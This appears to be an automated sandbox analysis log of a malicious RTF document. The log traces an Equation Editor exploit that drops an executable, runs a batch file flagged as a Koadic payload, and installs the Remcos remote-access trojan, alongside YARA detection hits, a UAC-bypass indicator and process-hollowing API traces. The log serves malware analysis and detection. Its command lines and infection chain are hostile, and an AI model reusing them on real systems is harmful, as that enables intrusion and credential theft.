                        Source: 00000017.00000002.469944205.000000001550B000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                        Source: 00000018.00000002.471719434.0000000014E7B000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                        Source: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                        Source: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                        Source: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                        Source: 00000011.00000002.436864812.000000001588B000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                        Source: 00000019.00000002.496351890.00000000158EB000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                        Source: 00000009.00000002.848171681.00000000157EB000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                        Source: 00000005.00000002.379080193.000000007DA80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                        Source: Process Memory Space: hjc.exe PID: 3416, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                        Source: Process Memory Space: remcos.exe PID: 3572, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                        Source: Process Memory Space: Rdxcjsng.PIF PID: 3784, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                        Source: Process Memory Space: remcos.exe PID: 3984, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                        Source: Process Memory Space: remcos.exe PID: 172, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                        Source: Process Memory Space: Rdxcjsng.PIF PID: 3328, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                        Source: Process Memory Space: remcos.exe PID: 3268, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                        Source: C:\Users\Public\Libraries\RdxcjsngO.bat, type: DROPPEDMatched rule: Koadic post-exploitation framework BAT payload Author: ditekSHen
                        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Roaming\hjc.exe
                        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\HJC[1].exe
                        Source: netutils.dll.5.dr Static PE information: section name: .
                        Source: C:\ProgramData\Remcos\remcos.exe Process Stats: CPU usage > 49%
                        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Memory allocated: 770B0000 page execute and read and write
                        Source: C:\Users\user\AppData\Roaming\hjc.exe Memory allocated: 770B0000 page execute and read and write
                        Source: C:\Windows\SysWOW64\extrac32.exe Memory allocated: 770B0000 page execute and read and write
                        Source: C:\ProgramData\Remcos\remcos.exe Memory allocated: 770B0000 page execute and read and write
                        Source: C:\Users\Public\Libraries\Rdxcjsng.PIF Memory allocated: 770B0000 page execute and read and write
                        Source: C:\Users\user\AppData\Roaming\hjc.exe Code function: 5_2_0324C368 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile, 5_2_0324C368
                        Source: C:\Users\user\AppData\Roaming\hjc.exe Code function: 5_2_0324C3F8 RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose, 5_2_0324C3F8
                        Source: C:\Users\user\AppData\Roaming\hjc.exe Code function: 5_2_0324C4DC RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose, 5_2_0324C4DC
                        Source: C:\Users\user\AppData\Roaming\hjc.exe Code function: 5_2_03247968 GetModuleHandleW,GetProcAddress,NtAllocateVirtualMemory, 5_2_03247968
                        Source: C:\Users\user\AppData\Roaming\hjc.exe Code function: 5_2_0324C3F6 RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose, 5_2_0324C3F6
                        Source: C:\Users\user\AppData\Roaming\hjc.exe Code function: 5_2_03247AC0 LoadLibraryW,GetProcAddress,NtWriteVirtualMemory,FreeLibrary, 5_2_03247AC0
                        Source: C:\Users\user\AppData\Roaming\hjc.exe Code function: 5_2_03247966 GetModuleHandleW,GetProcAddress,NtAllocateVirtualMemory, 5_2_03247966
                        Source: C:\Users\user\AppData\Roaming\hjc.exe Code function: 5_2_03247F46 CreateProcessAsUserW,GetThreadContext,NtReadVirtualMemory,NtUnmapViewOfSection,NtWriteVirtualMemory,NtWriteVirtualMemory,SetThreadContext,NtResumeThread, 5_2_03247F46
                        Source: C:\Users\user\AppData\Roaming\hjc.exe Code function: 5_2_03247F48 CreateProcessAsUserW,GetThreadContext,NtReadVirtualMemory,NtUnmapViewOfSection,NtWriteVirtualMemory,NtWriteVirtualMemory,SetThreadContext,NtResumeThread, 5_2_03247F48
                        Source: C:\ProgramData\Remcos\remcos.exe Code function: 9_2_0334C4DC NtOpenFile,NtReadFile,NtClose, 9_2_0334C4DC
                        Source: C:\ProgramData\Remcos\remcos.exe Code function: 9_2_03347968 GetModuleHandleW,NtAllocateVirtualMemory, 9_2_03347968
                        Source: C:\ProgramData\Remcos\remcos.exe Code function: 9_2_03347966 GetModuleHandleW,NtAllocateVirtualMemory, 9_2_03347966
                        Source: C:\Users\user\AppData\Roaming\hjc.exe Code function: 5_2_0324CA6C CreateProcessAsUserW,WaitForSingleObject,CloseHandle,CloseHandle, 5_2_0324CA6C
                        Source: Joe Sandbox View Dropped File: C:\Users\Public\Libraries\easinvoker.exe 30951DB8BFC21640645AA9144CFEAA294BB7C6980EF236D28552B6F4F3F92A96
                        Source: C:\Users\user\AppData\Roaming\hjc.exe Code function: String function: 032344A0 appears 67 times
                        Source: C:\Users\user\AppData\Roaming\hjc.exe Code function: String function: 03236658 appears 32 times
                        Source: C:\Users\user\AppData\Roaming\hjc.exe Code function: String function: 03234698 appears 247 times
                        Source: C:\Users\user\AppData\Roaming\hjc.exe Code function: String function: 03234824 appears 882 times
                        Source: C:\Users\user\AppData\Roaming\hjc.exe Code function: String function: 03247BE8 appears 45 times
                        Source: C:\ProgramData\Remcos\remcos.exe Code function: String function: 03334698 appears 156 times
                        Source: C:\ProgramData\Remcos\remcos.exe Code function: String function: 03336658 appears 32 times
                        Source: C:\ProgramData\Remcos\remcos.exe Code function: String function: 03334824 appears 628 times
                        Source: netutils.dll.5.dr Static PE information: Number of sections : 19 > 10
                        Source: OKhCyJ619J.rtf, type: SAMPLEMatched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
                        Source: 5.2.hjc.exe.15ca0000.10.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                        Source: 5.2.hjc.exe.15ca0000.10.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                        Source: 5.2.hjc.exe.15ca0000.10.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                        Source: 5.2.hjc.exe.15ca0000.10.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                        Source: 5.2.hjc.exe.15ca0000.10.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                        Source: 5.2.hjc.exe.15ca0000.10.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                        Source: 0000000C.00000002.399844258.0000000014D2B000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                        Source: 00000017.00000002.469944205.000000001550B000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                        Source: 00000018.00000002.471719434.0000000014E7B000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                        Source: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                        Source: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                        Source: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                        Source: 00000011.00000002.436864812.000000001588B000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                        Source: 00000019.00000002.496351890.00000000158EB000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                        Source: 00000009.00000002.848171681.00000000157EB000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                        Source: 00000005.00000002.379080193.000000007DA80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                        Source: Process Memory Space: hjc.exe PID: 3416, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                        Source: Process Memory Space: remcos.exe PID: 3572, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                        Source: Process Memory Space: Rdxcjsng.PIF PID: 3784, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                        Source: Process Memory Space: remcos.exe PID: 3984, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                        Source: Process Memory Space: remcos.exe PID: 172, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                        Source: Process Memory Space: Rdxcjsng.PIF PID: 3328, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                        Source: Process Memory Space: remcos.exe PID: 3268, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                        Source: C:\Users\Public\Libraries\RdxcjsngO.bat, type: DROPPEDMatched rule: MALWARE_BAT_KoadicBAT author = ditekSHen, description = Koadic post-exploitation framework BAT payload
                        Source: bhv1FE0.tmp.20.dr, bhvF6ED.tmp.13.dr Binary or memory string: org.slneighbors
                        Source: classification engine Classification label: mal100.phis.troj.spyw.expl.evad.winRTF@29/24@30/4
                        Source: C:\Users\user\AppData\Roaming\hjc.exe Code function: 5_2_03237F8E GetDiskFreeSpaceA,5_2_03237F8E
                        Source: C:\Users\user\AppData\Roaming\hjc.exe Code function: 5_2_03246D84 CoCreateInstance,5_2_03246D84
                        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\Desktop\~$hCyJ619J.rtf
                        Source: C:\ProgramData\Remcos\remcos.exe Mutant created: \Sessions\1\BaseNamedObjects\Rmc-L24XL1
                        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\CVR5FAC.tmp
                        Source: C:\Users\user\AppData\Roaming\hjc.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\RdxcjsngO.bat" "
                        Source: C:\Users\user\AppData\Roaming\hjc.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                        Source: C:\ProgramData\Remcos\remcos.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                        Source: C:\Users\Public\Libraries\Rdxcjsng.PIF Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                        Source: C:\ProgramData\Remcos\remcos.exe System information queried: HandleInformation
                        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File read: C:\Users\desktop.ini
                        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts
                        Source: C:\Users\user\AppData\Roaming\hjc.exe File read: C:\Windows\System32\drivers\etc\hosts
                        Source: C:\ProgramData\Remcos\remcos.exe File read: C:\Windows\System32\drivers\etc\hosts
                        Source: remcos.exe, 0000000D.00000002.428464556.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                        Source: remcos.exe, 0000000D.00000002.428464556.0000000000400000.00000040.80000000.00040000.00000000.sdmp, remcos.exe, 0000000E.00000002.417440907.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                        Source: remcos.exe, 0000000D.00000002.428464556.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
                        Source: remcos.exe, 0000000D.00000002.428464556.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
                        Source: remcos.exe, 0000000D.00000002.428464556.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                        Source: remcos.exe, 0000000D.00000002.428464556.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                        Source: remcos.exe, 0000000D.00000002.428464556.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                        Source: OKhCyJ619J.rtf ReversingLabs: Detection: 55%
                        Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\AppData\Roaming\hjc.exe "C:\Users\user\AppData\Roaming\hjc.exe"
                        Source: C:\Users\user\AppData\Roaming\hjc.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\RdxcjsngO.bat" "
                        Source: C:\Users\user\AppData\Roaming\hjc.exe Process created: C:\Windows\SysWOW64\extrac32.exe C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\user\AppData\Roaming\hjc.exe C:\\Users\\Public\\Libraries\\Rdxcjsng.PIF
                        Source: C:\Users\user\AppData\Roaming\hjc.exe Process created: C:\ProgramData\Remcos\remcos.exe "C:\ProgramData\Remcos\remcos.exe"
                        Source: unknown Process created: C:\Users\Public\Libraries\Rdxcjsng.PIF "C:\Users\Public\Libraries\Rdxcjsng.PIF"
                        Source: C:\ProgramData\Remcos\remcos.exe Process created: C:\ProgramData\Remcos\remcos.exe C:\ProgramData\Remcos\remcos.exe /stext "C:\Users\user\AppData\Local\Temp\qrvhclucfnyufuwghezckwpljsyrzdsj"
                        Source: C:\ProgramData\Remcos\remcos.exe Process created: C:\ProgramData\Remcos\remcos.exe C:\ProgramData\Remcos\remcos.exe /stext "C:\Users\user\AppData\Local\Temp\amas"
                        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                        Source: C:\ProgramData\Remcos\remcos.exe Process created: C:\ProgramData\Remcos\remcos.exe C:\ProgramData\Remcos\remcos.exe /stext "C:\Users\user\AppData\Local\Temp\dgnkdwq"
                        Source: unknown Process created: C:\ProgramData\Remcos\remcos.exe "C:\ProgramData\Remcos\remcos.exe"
                        Source: C:\ProgramData\Remcos\remcos.exe Process created: C:\ProgramData\Remcos\remcos.exe C:\ProgramData\Remcos\remcos.exe /stext "C:\Users\user\AppData\Local\Temp\pisbdjmsvpzm"
                        Source: C:\ProgramData\Remcos\remcos.exe Process created: C:\ProgramData\Remcos\remcos.exe C:\ProgramData\Remcos\remcos.exe /stext "C:\Users\user\AppData\Local\Temp\skxtebeuixrzqiq"
                        Source: C:\ProgramData\Remcos\remcos.exe Process created: C:\ProgramData\Remcos\remcos.exe C:\ProgramData\Remcos\remcos.exe /stext "C:\Users\user\AppData\Local\Temp\cecmfupoefjdsweembv"
                        Source: unknown Process created: C:\ProgramData\Remcos\remcos.exe "C:\ProgramData\Remcos\remcos.exe"
                        Source: unknown Process created: C:\Users\Public\Libraries\Rdxcjsng.PIF "C:\Users\Public\Libraries\Rdxcjsng.PIF"
                        Source: unknown Process created: C:\ProgramData\Remcos\remcos.exe "C:\ProgramData\Remcos\remcos.exe"
                        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: wow64win.dll
                        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: wow64cpu.dll
                        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: msi.dll
                        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: cryptsp.dll
                        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: rpcrtremote.dll
                        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: dwmapi.dll
                        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: version.dll
                        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: secur32.dll
                        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: winhttp.dll
                        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: webio.dll
                        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: iphlpapi.dll
                        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: winnsi.dll
                        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: dnsapi.dll
                        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: nlaapi.dll
                        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: dhcpcsvc6.dll
                        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: dhcpcsvc.dll
                        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: rasadhlp.dll
                        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: propsys.dll
                        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: ntmarta.dll
                        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: apphelp.dll
                        Source: C:\Users\user\AppData\Roaming\hjc.exe Section loaded: wow64win.dll
                        Source: C:\Users\user\AppData\Roaming\hjc.exe Section loaded: wow64cpu.dll
                        Source: C:\Users\user\AppData\Roaming\hjc.exe Section loaded: version.dll
                        Source: C:\Users\user\AppData\Roaming\hjc.exe Section loaded: dwmapi.dll
                        Source: C:\Users\user\AppData\Roaming\hjc.exe Section loaded: archiveint.dll
                        Source: C:\Users\user\AppData\Roaming\hjc.exe Section loaded: url.dll
                        Source: C:\Users\user\AppData\Roaming\hjc.exe Section loaded: ieframe.dll
                        Source: C:\Users\user\AppData\Roaming\hjc.exe Section loaded: amsi.dll
